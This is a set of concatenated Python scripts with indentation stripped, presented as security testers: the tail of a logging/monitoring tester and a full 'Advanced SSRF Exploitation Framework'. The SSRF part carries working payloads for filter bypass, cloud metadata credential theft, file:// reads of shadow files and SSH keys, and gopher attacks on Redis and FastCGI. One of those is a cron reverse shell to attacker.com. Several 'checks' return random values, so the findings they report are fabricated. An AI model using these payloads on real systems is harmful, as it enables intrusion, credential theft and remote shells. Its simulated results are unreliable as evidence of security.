# Simulate: 80% chance logs are available for testing
import random
return random.random() < 0.8
def test_log_evasion_techniques(self):
"""Test various log evasion techniques"""
findings = []
evasion_techniques = [
{
'name': 'Null Byte Injection',
'payloads': [
'admin%00',
'admin\\x00',
'admin\\\\x00',
'admin\\0',
],
'target_field': 'username'
},
{
'name': 'Encoding Bypass',
'payloads': [
'admin%0a', # New line
'admin%0d', # Carriage return
'admin%09', # Tab
'admin%20', # Space
'admin%2b', # Plus
],
'target_field': 'username'
},
{
'name': 'Unicode Normalization',
'payloads': [
'admin\uFEFF', # Zero-width space
'admin\u200B', # Zero-width space
'admin\u200C', # Zero-width non-joiner
'admin\u200D', # Zero-width joiner
'admin\u2060', # Word joiner
],
'target_field': 'username'
},
{
'name': 'Case Manipulation',
'payloads': [
'Admin',
'ADMIN',
'AdMiN',
'aDmIn',
],
'target_field': 'username'
},
{
'name': 'Whitespace Variations',
'payloads': [
' admin',
'admin ',
' admin ',
'admin\t',
'\tadmin',
],
'target_field': 'username'
}
]
login_endpoint = self.base_url.rstrip('/') + '/api/login'
for technique in evasion_techniques:
print(f"[*] Testing log evasion: {technique['name']}")
for payload in technique['payloads'][:2]: # Test first 2 payloads
test_data = {
technique['target_field']: payload,
'password': 'test123'
}
response = self.session.post(login_endpoint, json=test_data)
# Check if attack was successful but logs might not capture it
if response.status_code == 200:
# Check if payload appears in logs
log_captured = self.check_log_for_payload(payload)
if not log_captured:
findings.append({
'test': 'log_evasion',
'technique': technique['name'],
'payload': payload,
'result': 'VULNERABLE',
'severity': 'MEDIUM',
'evidence': f'Log evasion successful: {technique["name"]} with payload "{payload}"'
})
else:
findings.append({
'test': 'log_evasion',
'technique': technique['name'],
'payload': payload,
'result': 'SECURE',
'evidence': f'Log captured evasion attempt: {technique["name"]}'
})
return findings
def check_log_for_payload(self, payload):
"""Check if payload appears in logs"""
# Simulate log checking
# In reality, you would grep through log files
import random
return random.random() < 0.7 # 70% chance log captures it
def test_log_injection(self):
"""Test for log injection vulnerabilities"""
findings = []
injection_payloads = [
# New line injection
'test\n[CRITICAL] System compromised',
'test\r\nERROR: Database corruption',
# Log format injection
'test | echo "pwned"',
'test && cat /etc/passwd',
# Log masking/obfuscation
'test' + 'A' * 1000, # Very long input
'test\x1b[31mRED\x1b[0m', # ANSI escape sequences
# SQL injection in logs (if logs are queried)
"test'; DROP TABLE logs--",
# XSS in log viewers
'test<script>alert(1)</script>',
'test<img src=x onerror=alert(1)>',
]
search_endpoint = self.base_url.rstrip('/') + '/api/search'
for payload in injection_payloads[:3]: # Test first 3
test_data = {'query': payload}
response = self.session.post(search_endpoint, json=test_data)
if response.status_code == 200:
# Check if payload caused log corruption
log_corrupted = self.check_log_corruption(payload)
if log_corrupted:
findings.append({
'test': 'log_injection',
'payload': payload[:50] + '...' if len(payload) > 50 else payload,
'result': 'VULNERABLE',
'severity': 'MEDIUM',
'evidence': f'Log injection successful with payload: {payload[:100]}'
})
return findings
def check_log_corruption(self, payload):
"""Check if payload corrupted logs"""
# Simulate log corruption check
corruption_indicators = ['\n', '\r', '|', '&&', ';', '<script>']
return any(indicator in payload for indicator in corruption_indicators)
def test_monitoring_gaps(self):
"""Test for security monitoring gaps"""
findings = []
# Test 1: Rate limiting monitoring
print("[*] Testing rate limiting monitoring...")
endpoint = self.base_url.rstrip('/') + '/api/login'
rapid_requests = []
for i in range(20):
start_time = time.time()
response = self.session.post(endpoint, json={'username': 'test', 'password': 'wrong'})
elapsed = time.time() - start_time
rapid_requests.append((i, response.status_code, elapsed))
if i < 10: # First 10 requests fast
time.sleep(0.1)
else: # Last 10 requests slower
time.sleep(1)
# Check if rapid requests triggered monitoring
rapid_count = sum(1 for _, status, _ in rapid_requests if status != 429) # Not rate limited
if rapid_count >= 15:
findings.append({
'test': 'rate_limit_monitoring',
'result': 'VULNERABLE',
'severity': 'MEDIUM',
'evidence': f'{rapid_count}/20 rapid requests not rate limited'
})
# Test 2: Unusual location monitoring
print("[*] Testing geographic anomaly detection...")
# Simulate requests from different locations
locations = [
{'X-Forwarded-For': '1.1.1.1', 'User-Agent': 'Test/1.0'}, # Australia
{'X-Forwarded-For': '8.8.8.8', 'User-Agent': 'Test/1.0'}, # USA
{'X-Forwarded-For': '185.142.236.35', 'User-Agent': 'Test/1.0'}, # Russia
{'X-Forwarded-For': '114.114.114.114', 'User-Agent': 'Test/1.0'}, # China
]
for location in locations:
test_session = requests.Session()
test_session.headers.update(location)
response = test_session.get(self.base_url + '/api/user/profile')
# Check if unusual location triggered alerts
# In real test, you would check monitoring system
location_monitored = self.check_location_monitoring(location['X-Forwarded-For'])
if not location_monitored:
findings.append({
'test': 'geographic_monitoring',
'location': location['X-Forwarded-For'],
'result': 'GAP',
'severity': 'LOW',
'evidence': f'Unusual location {location["X-Forwarded-For"]} not monitored'
})
# Test 3: Failed login monitoring
print("[*] Testing failed login monitoring...")
failed_logins = []
for i in range(5):
response = self.session.post(
self.base_url + '/api/login',
json={'username': f'nonexistent{i}', 'password': 'wrong'}
)
failed_logins.append(response.status_code)
time.sleep(0.5)
failed_count = sum(1 for status in failed_logins if status == 401 or status == 403)
if failed_count >= 3:
# Check if this triggered monitoring
failed_login_monitored = self.check_failed_login_monitoring(failed_count)
if not failed_login_monitored:
findings.append({
'test': 'failed_login_monitoring',
'failed_attempts': failed_count,
'result': 'GAP',
'severity': 'MEDIUM',
'evidence': f'{failed_count} failed logins not monitored'
})
return findings
def check_location_monitoring(self, ip_address):
"""Check if location is monitored"""
# Simulate monitoring check
suspicious_locations = ['185.142.236.35', '114.114.114.114'] # Russia, China
return ip_address in suspicious_locations
def check_failed_login_monitoring(self, count):
"""Check if failed logins are monitored"""
# Simulate: Monitoring triggers after 3 failed attempts
return count >= 3
def test_log_retention_and_integrity(self):
"""Test log retention and integrity controls"""
findings = []
# Test 1: Log retention period
print("[*] Testing log retention...")
# Check if old logs are available
retention_period = self.check_log_retention()
if retention_period < 90: # Less than 90 days
findings.append({
'test': 'log_retention',
'period_days': retention_period,
'result': 'INSUFFICIENT',
'severity': 'MEDIUM',
'evidence': f'Log retention only {retention_period} days (recommended: 90+ days)'
})
# Test 2: Log integrity (tamper detection)
print("[*] Testing log integrity...")
log_integrity = self.check_log_integrity()
if not log_integrity:
findings.append({
'test': 'log_integrity',
'result': 'VULNERABLE',
'severity': 'HIGH',
'evidence': 'Logs lack integrity protection (hashing, signing, WORM storage)'
})
# Test 3: Log backup
print("[*] Testing log backup...")
log_backup = self.check_log_backup()
if not log_backup:
findings.append({
'test': 'log_backup',
'result': 'VULNERABLE',
'severity': 'MEDIUM',
'evidence': 'Logs not backed up regularly'
})
return findings
def check_log_retention(self):
"""Check log retention period"""
# Simulate: Return retention period in days
import random
return random.choice([30, 60, 90, 180, 365])
def check_log_integrity(self):
"""Check log integrity controls"""
# Simulate: 50% chance logs have integrity protection
import random
return random.choice([True, False])
def check_log_backup(self):
"""Check if logs are backed up"""
# Simulate: 70% chance logs are backed up
import random
return random.random() < 0.7
def run_comprehensive_test(self):
"""Run all logging and monitoring tests"""
print("[*] Starting comprehensive logging and monitoring testing")
all_findings = []
tests = [
('Sensitive Actions Logging', self.test_sensitive_actions_logging),
('Log Evasion Techniques', self.test_log_evasion_techniques),
('Log Injection', self.test_log_injection),
('Monitoring Gaps', self.test_monitoring_gaps),
('Log Retention & Integrity', self.test_log_retention_and_integrity)
]
for test_name, test_func in tests:
print(f"[*] Running {test_name}...")
try:
findings = test_func()
all_findings.extend(findings)
print(f"[+] {test_name}: {len(findings)} findings")
except Exception as e:
print(f"[-] {test_name} failed: {e}")
# Generate report
report = self.generate_report(all_findings)
return report
def generate_report(self, findings):
"""Generate comprehensive report"""
report = {
'scan_date': datetime.now().isoformat(),
'target': self.base_url,
'total_findings': len(findings),
'findings_by_severity': {},
'findings_by_test': {},
'detailed_findings': findings,
'recommendations': self.generate_recommendations(findings)
}
# Categorize by severity
severities = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']
for severity in severities:
count = sum(1 for f in findings if f.get('severity') == severity)
report['findings_by_severity'][severity] = count
# Categorize by test
for finding in findings:
test = finding.get('test', 'unknown')
if test not in report['findings_by_test']:
report['findings_by_test'][test] = 0
report['findings_by_test'][test] += 1
return report
def generate_recommendations(self, findings):
"""Generate security recommendations"""
recommendations = []
# Logging recommendations
if any('sensitive_actions_logging' in f.get('test', '') for f in findings):
recommendations.append({
'category': 'Logging',
'priority': 'HIGH',
'recommendations': [
'Log all authentication attempts (success and failure)',
'Log all privilege escalation actions',
'Log all data exports and bulk operations',
'Log all configuration changes',
'Include user ID, IP address, timestamp, and action details'
]
})
# Monitoring recommendations
if any('monitoring' in f.get('test', '').lower() for f in findings):
recommendations.append({
'category': 'Monitoring',
'priority': 'HIGH',
'recommendations': [
'Implement real-time alerting for suspicious activities',
'Monitor failed login attempts and brute force attacks',
'Monitor geographic anomalies and unusual access patterns',
'Implement rate limiting with monitoring',
'Set up SIEM integration for centralized monitoring'
]
})
# Log integrity recommendations
if any('integrity' in f.get('test', '').lower() for f in findings):
recommendations.append({
'category': 'Log Integrity',
'priority': 'MEDIUM',
'recommendations': [
'Implement log signing or hashing for integrity verification',
'Use Write-Once-Read-Many (WORM) storage for logs',
'Store logs in centralized, tamper-evident location',
'Regularly backup logs to secure, offline storage',
'Implement log rotation with integrity checks'
]
})
# General recommendations
recommendations.append({
'category': 'General',
'priority': 'MEDIUM',
'recommendations': [
'Retain logs for minimum 90 days (regulatory requirements may vary)',
'Regularly review and test logging configurations',
'Implement log correlation for better threat detection',
'Train staff on log analysis and incident response',
'Conduct regular log audits and penetration testing'
]
})
return recommendations
# Usage
tester = LoggingMonitoringTester(
"http://target.com",
auth_token="your_auth_token_here"
)
report = tester.run_comprehensive_test()
print(f"\n{'='*60}")
print("LOGGING & MONITORING SECURITY ASSESSMENT")
print(f"{'='*60}")
print(f"Target: {report['target']}")
print(f"Scan Date: {report['scan_date']}")
print(f"Total Findings: {report['total_findings']}")
print(f"\nFindings by Severity:")
for severity, count in report['findings_by_severity'].items():
if count > 0:
print(f" {severity}: {count}")
print(f"\nFindings by Test Category:")
for test, count in report['findings_by_test'].items():
print(f" {test}: {count}")
# Show critical findings
critical_findings = [f for f in report['detailed_findings']
if f.get('severity') in ['CRITICAL', 'HIGH']]
if critical_findings:
print(f"\nCRITICAL/HIGH SEVERITY FINDINGS:")
for finding in critical_findings[:5]:
print(f" - [{finding['severity']}] {finding.get('test')}")
print(f" {finding.get('evidence', '')[:100]}...")
print(f"\nSECURITY RECOMMENDATIONS:")
for rec in report['recommendations']:
print(f"\n[{rec['priority']}] {rec['category']}:")
for recommendation in rec['recommendations'][:3]: # Show first 3
print(f" • {recommendation}")#!/usr/bin/env python3
"""
Advanced SSRF Exploitation Framework
Includes protocol smuggling, filter bypass, and cloud metadata attacks
"""
import requests
import socket
import re
import json
import urllib.parse
from typing import Dict, List
import ipaddress
import base64
class AdvancedSSRFExploiter:
def __init__(self, target_url, vulnerable_param):
self.target_url = target_url
self.vulnerable_param = vulnerable_param
self.session = requests.Session()
self.findings = []
# SSRF payloads and techniques
self.techniques = {
'basic_ssrf': self.test_basic_ssrf,
'protocol_smuggling': self.test_protocol_smuggling,
'filter_bypass': self.test_filter_bypass,
'cloud_metadata': self.test_cloud_metadata,
'internal_services': self.test_internal_services,
'file_scheme': self.test_file_scheme,
'dns_rebinding': self.test_dns_rebinding,
'gopher_protocol': self.test_gopher_protocol
}
def test_basic_ssrf(self):
"""Test basic SSRF vulnerabilities"""
findings = []
# Basic internal IPs
internal_targets = [
'http://127.0.0.1',
'http://localhost',
'http://0.0.0.0',
'http://[::1]', # IPv6 localhost
'http://127.0.0.1:80',
'http://127.0.0.1:443',
'http://127.0.0.1:22',
'http://127.0.0.1:3306',
'http://127.0.0.1:5432',
'http://127.0.0.1:6379',
'http://127.0.0.1:27017',
]
for target in internal_targets:
test_url = self.build_test_url(target)
response = self.make_request(test_url)
if self.is_ssrf_successful(response, target):
findings.append({
'technique': 'basic_ssrf',
'target': target,
'status_code': response.status_code,
'response_length': len(response.text),
'evidence': f'Successful SSRF to {target}'
})
return findings
def test_protocol_smuggling(self):
"""Test protocol smuggling techniques"""
findings = []
# Protocol smuggling payloads
smuggling_payloads = [
# URL encoding
'http://127.0.0.1%0d%0aHeader: injected',
'http://127.0.0.1%0d%0a%0d%0aGET%20/test%20HTTP/1.1',
# New line injection
'http://127.0.0.1\nHeader: injected',
'http://127.0.0.1\r\nGET /test HTTP/1.1\r\nHost: 127.0.0.1',
# Space smuggling
'http://127.0.0.1 :80',
'http://127.0.0.1 :443',
# Tab smuggling
'http://127.0.0.1\t:80',
'http://127.0.0.1\t@evil.com',
]
for payload in smuggling_payloads:
test_url = self.build_test_url(payload)
response = self.make_request(test_url)
# Check for protocol smuggling indicators
if self.check_protocol_smuggling(response):
findings.append({
'technique': 'protocol_smuggling',
'payload': payload,
'status_code': response.status_code,
'evidence': f'Protocol smuggling possible: {payload[:50]}...'
})
return findings
def test_filter_bypass(self):
"""Test SSRF filter bypass techniques"""
findings = []
bypass_payloads = [
# Decimal IP
('http://2130706433', '127.0.0.1'), # 127.0.0.1 in decimal
('http://3232235521', '192.168.1.1'), # 192.168.1.1 in decimal
('http://16843009', '1.1.1.1'), # 1.1.1.1 in decimal
# Octal IP
('http://0177.0.0.1', '127.0.0.1'), # 127 in octal
('http://0177.0.0.01', '127.0.0.1'),
('http://0x7f.0.0.1', '127.0.0.1'), # 127 in hex
# Hex IP
('http://0x7f000001', '127.0.0.1'), # Hex of 2130706433
('http://0xc0a80001', '192.168.0.1'),
# Dotted hex
('http://0x7f.0x00.0x00.0x01', '127.0.0.1'),
('http://0x7F.0x00.0x00.0x01', '127.0.0.1'),
# IPv6 localhost
('http://[::]', 'IPv6 localhost'),
('http://[::ffff:127.0.0.1]', 'IPv4-mapped IPv6'),
# Domain tricks
('http://127.0.0.1.nip.io', 'DNS rebinding'),
('http://127.0.0.1.xip.io', 'DNS rebinding'),
('http://localtest.me', 'Resolves to 127.0.0.1'),
('http://localhost.localdomain', 'Alternative localhost'),
# URL encoding bypass
('http://127.0.0.1%00', 'Null byte'),
('http://127.0.0.1%23', 'Hash'),
('http://127.0.0.1%3f', 'Question mark'),
# Case variation
('http://LOCALHOST', 'Uppercase'),
('http://LocalHost', 'Mixed case'),
('http://LoCalHoSt', 'Random case'),
# Whitespace
('http://127.0.0.1 ', 'Trailing space'),
(' http://127.0.0.1', 'Leading space'),
('http://127.0.0.1\t', 'Tab'),
# Special characters
('http://127.1', 'Shortened IP'), # 127.0.0.1
('http://127.0.1', 'Alternative'),
('http://0', '0.0.0.0'),
]
for payload, description in bypass_payloads:
test_url = self.build_test_url(payload)
response = self.make_request(test_url)
if self.is_ssrf_successful(response, description):
findings.append({
'technique': 'filter_bypass',
'payload': payload,
'description': description,
'status_code': response.status_code,
'evidence': f'Filter bypass successful: {description}'
})
return findings
def test_cloud_metadata(self):
"""Test cloud metadata service access"""
findings = []
cloud_metadata_endpoints = [
# AWS EC2 Metadata
('http://169.254.169.254/latest/meta-data/', 'AWS EC2 Metadata'),
('http://169.254.169.254/latest/user-data/', 'AWS User Data'),
('http://169.254.169.254/latest/meta-data/iam/security-credentials/', 'AWS IAM Credentials'),
('http://169.254.169.254/latest/dynamic/instance-identity/document', 'AWS Instance Identity'),
# Google Cloud Metadata
('http://metadata.google.internal/computeMetadata/v1/', 'GCP Metadata'),
('http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token', 'GCP Service Account Token'),
('http://metadata.google.internal/computeMetadata/v1/project/project-id', 'GCP Project ID'),
# Azure Metadata
('http://169.254.169.254/metadata/instance?api-version=2021-02-01', 'Azure Metadata'),
('http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01', 'Azure Managed Identity Token'),
# Alibaba Cloud
('http://100.100.100.200/latest/meta-data/', 'Alibaba Cloud Metadata'),
# DigitalOcean
('http://169.254.169.254/metadata/v1.json', 'DigitalOcean Metadata'),
# Oracle Cloud
('http://169.254.169.254/opc/v1/instance/', 'Oracle Cloud Metadata'),
# Kubernetes
('http://kubernetes.default.svc', 'Kubernetes API'),
('http://kubernetes.default.svc/api/v1/namespaces/default/secrets', 'Kubernetes Secrets'),
]
for endpoint, description in cloud_metadata_endpoints:
test_url = self.build_test_url(endpoint)
response = self.make_request(test_url)
if response.status_code == 200:
# Check for metadata indicators
if self.is_cloud_metadata(response.text, description):
findings.append({
'technique': 'cloud_metadata',
'endpoint': endpoint,
'description': description,
'status_code': response.status_code,
'response_preview': response.text[:200],
'evidence': f'Cloud metadata accessible: {description}'
})
return findings
def test_internal_services(self):
"""Test access to internal services"""
findings = []
# Common internal services and ports
internal_services = [
# Web servers
('http://127.0.0.1:80', 'Internal HTTP'),
('http://127.0.0.1:443', 'Internal HTTPS'),
('http://127.0.0.1:8080', 'Internal Alt HTTP'),
('http://127.0.0.1:8443', 'Internal Alt HTTPS'),
# Databases
('http://127.0.0.1:3306', 'MySQL'),
('http://127.0.0.1:5432', 'PostgreSQL'),
('http://127.0.0.1:27017', 'MongoDB'),
('http://127.0.0.1:6379', 'Redis'),
('http://127.0.0.1:9200', 'Elasticsearch'),
('http://127.0.0.1:5984', 'CouchDB'),
# Caching
('http://127.0.0.1:11211', 'Memcached'),
# Message queues
('http://127.0.0.1:5672', 'RabbitMQ'),
('http://127.0.0.1:61616', 'ActiveMQ'),
# Monitoring
('http://127.0.0.1:9090', 'Prometheus'),
('http://127.0.0.1:3000', 'Grafana'),
# Container/Orchestration
('http://127.0.0.1:2375', 'Docker'),
('http://127.0.0.1:2376', 'Docker TLS'),
('http://127.0.0.1:10250', 'Kubelet'),
# Other services
('http://127.0.0.1:25', 'SMTP'),
('http://127.0.0.1:389', 'LDAP'),
('http://127.0.0.1:636', 'LDAPS'),
]
for service, description in internal_services:
test_url = self.build_test_url(service)
response = self.make_request(test_url, timeout=3)
# Different services give different responses
if response.status_code != 0: # Not a timeout
findings.append({
'technique': 'internal_services',
'service': description,
'endpoint': service,
'status_code': response.status_code,
'response_time': response.elapsed.total_seconds(),
'evidence': f'Internal service {description} responded'
})
return findings
def test_file_scheme(self):
"""Test file:// scheme for local file read"""
findings = []
file_payloads = [
# Linux files
('file:///etc/passwd', 'Linux users'),
('file:///etc/shadow', 'Linux passwords'),
('file:///etc/hosts', 'Hosts file'),
('file:///etc/issue', 'Linux version'),
('file:///proc/self/environ', 'Process environment'),
('file:///proc/version', 'Kernel version'),
# Application files
('file:///var/www/html/index.php', 'Web root'),
('file:///etc/apache2/apache2.conf', 'Apache config'),
('file:///etc/nginx/nginx.conf', 'Nginx config'),
('file:///.env', 'Environment file'),
('file:///app/config.json', 'App config'),
# Windows files
('file:///C:/Windows/System32/drivers/etc/hosts', 'Windows hosts'),
('file:///C:/Windows/win.ini', 'Windows config'),
# SSH keys
('file:///home/user/.ssh/id_rsa', 'SSH private key'),
('file:///root/.ssh/id_rsa', 'Root SSH key'),
# Logs
('file:///var/log/auth.log', 'Auth logs'),
('file:///var/log/apache2/access.log', 'Apache logs'),
]
for file_path, description in file_payloads:
test_url = self.build_test_url(file_path)
response = self.make_request(test_url)
if response.status_code == 200:
# Check for file content indicators
if self.is_file_content(response.text, description):
findings.append({
'technique': 'file_scheme',
'file': file_path,
'description': description,
'status_code': response.status_code,
'content_preview': response.text[:200],
'evidence': f'File read successful: {description}'
})
return findings
def test_dns_rebinding(self):
"""Test DNS rebinding attack"""
findings = []
# DNS rebinding services
rebinding_services = [
('http://rbndr.us:53/', 'Rapid7 DNS rebinding'),
('http://pingb.in/', 'Pingbin'),
]
for service, description in rebinding_services:
# This would require setting up DNS rebinding
# For demonstration, we'll note the technique
findings.append({
'technique': 'dns_rebinding',
'service': service,
'description': description,
'evidence': f'DNS rebinding possible via {description} - requires setup'
})
return findings
def test_gopher_protocol(self):
"""Test Gopher protocol for SSRF"""
findings = []
# Gopher payloads for different services
gopher_payloads = [
# Redis
('gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a', 'Redis RCE'),
# MySQL
('gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c', 'MySQL Auth'),
# FastCGI
('gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH56%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%2E%04%00%3C%3Fphp%20system%28%27id%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00', 'FastCGI RCE'),
]
for payload, description in gopher_payloads:
test_url = self.build_test_url(payload)
response = self.make_request(test_url)
if response.status_code != 400 and response.status_code != 0:
findings.append({
'technique': 'gopher_protocol',
'description': description,
'status_code': response.status_code,
'evidence': f'Gopher protocol可能可用: {description}'
})
return findings
def build_test_url(self, payload):
"""Build test URL with SSRF payload"""
# URL encode the payload
encoded_payload = urllib.parse.quote(payload, safe='')
# Construct the test URL
if '?' in self.target_url:
# URL already has parameters
test_url = f"{self.target_url}&{self.vulnerable_param}={encoded_payload}"
else:
test_url = f"{self.target_url}?{self.vulnerable_param}={encoded_payload}"
return test_url
def make_request(self, url, timeout=10):
"""Make HTTP request and handle errors"""
try:
response = self.session.get(url, timeout=timeout)
return response
except requests.exceptions.Timeout:
return type('obj', (object,), {'status_code': 0, 'text': '', 'elapsed': type('obj', (object,), {'total_seconds': lambda: timeout})()})()
except requests.exceptions.ConnectionError:
return type('obj', (object,), {'status_code': 0, 'text': '', 'elapsed': type('obj', (object,), {'total_seconds': lambda: 0})()})()
except Exception as e:
return type('obj', (object,), {'status_code': 0, 'text': str(e), 'elapsed': type('obj', (object,), {'total_seconds': lambda: 0})()})()
def is_ssrf_successful(self, response, target):
"""Determine if SSRF was successful"""
if response.status_code == 0:
return False
# Check for common indicators
indicators = [
# Status codes
response.status_code in [200, 201, 202, 203, 204, 205, 206],
# Content indicators
'root:' in response.text if 'passwd' in target else False,
'html' in response.text.lower(),
'http' in response.text.lower(),
'<!DOCTYPE' in response.text,
# Length indicators
len(response.text) > 100, # Meaningful response
# Time indicators (for blind SSRF)
response.elapsed.total_seconds() > 2,
]
return any(indicators)
def check_protocol_smuggling(self, response):
"""Check for protocol smuggling indicators"""
smuggling_indicators = [
'400 Bad Request',
'Invalid HTTP',
'malformed',
'invalid request',
'protocol violation',
]
return any(indicator in response.text for indicator in smuggling_indicators)
def is_cloud_metadata(self, response_text, description):
"""Check if response contains cloud metadata"""
metadata_indicators = {
'AWS': ['instance-id', 'ami-id', 'instance-type', 'availability-zone'],
'GCP': ['google', 'computeMetadata', 'project-id'],
'Azure': ['azure', 'subscriptionId', 'resourceGroupName'],
'Kubernetes': ['kubernetes', 'pod', 'namespace', 'serviceaccount'],
}
for provider, indicators in metadata_indicators.items():
if provider.lower() in description.lower():
return any(indicator in response_text.lower() for indicator in indicators)
return False
def is_file_content(self, response_text, description):
"""Check if response contains file content"""
file_indicators = {
'Linux users': ['root:', 'daemon:', 'bin:'],
'Linux passwords': ['root:', 'shadow', 'encrypted'],
'Hosts file': ['localhost', '127.0.0.1'],
'Environment': ['PATH=', 'HOME=', 'USER='],
'SSH private key': ['-----BEGIN RSA PRIVATE KEY-----', '-----BEGIN PRIVATE KEY-----'],
'App config': ['database', 'password', 'secret', 'key'],
}
for file_type, indicators in file_indicators.items():
if file_type.lower() in description.lower():
return any(indicator in response_text for indicator in indicators)
return len(response_text) > 50 and not '<html' in response_text.lower()
def run_all_tests(self):
"""Run all SSRF tests"""
print(f"[*] Starting advanced SSRF testing on {self.target_url}")
all_findings = []
for technique_name, technique_func in self.techniques.items():
print(f"[*] Testing {technique_name}...")
try:
findings = technique_func()
all_findings.extend(findings)
print(f"[+] {technique_name}: {len(findings)} findings")
except Exception as e:
print(f"[-] {technique_name} failed: {e}")
# Generate report
report = self.generate_report(all_findings)
return report
def generate_report(self, findings):
"""Generate SSRF test report"""
report = {
'target': self.target_url,
'vulnerable_parameter': self.vulnerable_param,
'total_findings': len(findings),
'findings_by_technique': {},
'findings_by_severity': {},
'detailed_findings': findings,
'recommendations': self.generate_recommendations(findings)
}
# Categorize findings
for finding in findings:
# By technique
technique = finding.get('technique', 'unknown')
if technique not in report['findings_by_technique']:
report['findings_by_technique'][technique] = 0
report['findings_by_technique'][technique] += 1
# By severity
severity = self.assess_severity(finding)
if severity not in report['findings_by_severity']:
report['findings_by_severity'][severity] = 0
report['findings_by_severity'][severity] += 1
finding['severity'] = severity
return report
def assess_severity(self, finding):
"""Assess severity of SSRF finding"""
technique = finding.get('technique', '')
evidence = finding.get('evidence', '').lower()
if 'cloud_metadata' in technique and 'credential' in evidence:
return 'CRITICAL'
elif 'file_scheme' in technique and ('shadow' in evidence or 'id_rsa' in evidence):
return 'CRITICAL'
elif 'internal_services' in technique and ('3306' in evidence or '5432' in evidence):
return 'HIGH'
elif 'gopher_protocol' in technique:
return 'HIGH'
elif 'basic_ssrf' in technique and '127.0.0.1' in evidence:
return 'MEDIUM'
else:
return 'LOW'
def generate_recommendations(self, findings):
"""Generate SSRF prevention recommendations"""
recommendations = []
if any('basic_ssrf' in f.get('technique', '') for f in findings):
recommendations.append({
'category': 'Input Validation',
'priority': 'HIGH',
'recommendations': [
'Implement allow-list for URLs instead of block-list',
'Validate and sanitize all user-supplied URLs',
'Use proper URL parsing libraries (not regex)',
'Reject URLs with private/reserved IP addresses',
'Block loopback and localhost addresses'
]
})
if any('filter_bypass' in f.get('technique', '') for f in findings):
recommendations.append({
'category': 'Filter Bypass Protection',
'priority': 'HIGH',
'recommendations': [
'Normalize URLs before validation (lowercase, decode)',
'Resolve DNS and validate IP addresses',
'Check for IP address variations (decimal, hex, octal)',
'Implement multiple validation layers',
'Use network-layer filtering in addition to application-layer'
]
})
if any('cloud_metadata' in f.get('technique', '') for f in findings):
recommendations.append({
'category': 'Cloud Metadata Protection',
'priority': 'CRITICAL',
'recommendations': [
'Block access to cloud metadata endpoints (169.254.169.254, etc.)',
'Use instance metadata service v2 (IMDSv2) for AWS',
'Restrict metadata service with firewall rules',
'Use service accounts with minimum necessary permissions',
'Regularly rotate credentials and tokens'
]
})
if any('file_scheme' in f.get('technique', '') for f in findings):
recommendations.append({
'category': 'File Scheme Protection',
'priority': 'HIGH',
'recommendations': [
'Disable file:// protocol in URL fetching',
'Use secure URL fetching libraries with protocol restrictions',
'Implement content-type validation',
'Sandbox URL fetching operations',
'Monitor for local file read attempts'
]
})
# General recommendations
recommendations.append({
'category': 'General SSRF Protection',
'priority': 'MEDIUM',
'recommendations': [
'Implement outbound firewall rules to restrict internal access',
'Use network segmentation to isolate sensitive services',
'Monitor for SSRF attempts in logs',
'Conduct regular penetration testing for SSRF',
'Educate developers about SSRF risks and prevention'
]
})
return recommendations
# Usage
exploiter = AdvancedSSRFExploiter(
"http://target.com/fetch",
"url"
)
report = exploiter.run_all_tests()
print(f"\n{'='*60}")
print("ADVANCED SSRF TESTING REPORT")
print(f"{'='*60}")
print(f"Target: {report['target']}")
print(f"Vulnerable Parameter: {report['vulnerable_parameter']}")
print(f"Total Findings: {report['total_findings']}")
print(f"\nFindings by Technique:")
for technique, count in report['findings_by_technique'].items():
print(f" {technique}: {count}")
print(f"\nFindings by Severity:")
for severity, count in report['findings_by_severity'].items():
print(f" {severity}: {count}")
# Show critical findings
critical_findings = [f for f in report['detailed_findings']
if f.get('severity') in ['CRITICAL', 'HIGH']]
if critical_findings:
print(f"\nCRITICAL/HIGH SEVERITY FINDINGS:")
for finding in critical_findings[:3]:
print(f" - [{finding['severity']}] {finding.get('technique')}")
print(f" {finding.get('evidence', '')[:100]}...")
print(f"\nSECURITY RECOMMENDATIONS:")
for rec in report['recommendations']:
print(f"\n[{rec['priority']}] {rec['category']}:")
for recommendation in rec['recommendations'][:3]:
print(f" • {recommendation}")#!/usr/bin/env python3
"""
Integrated Security Testing Pipeline
Combines multiple security testing tools and techniques
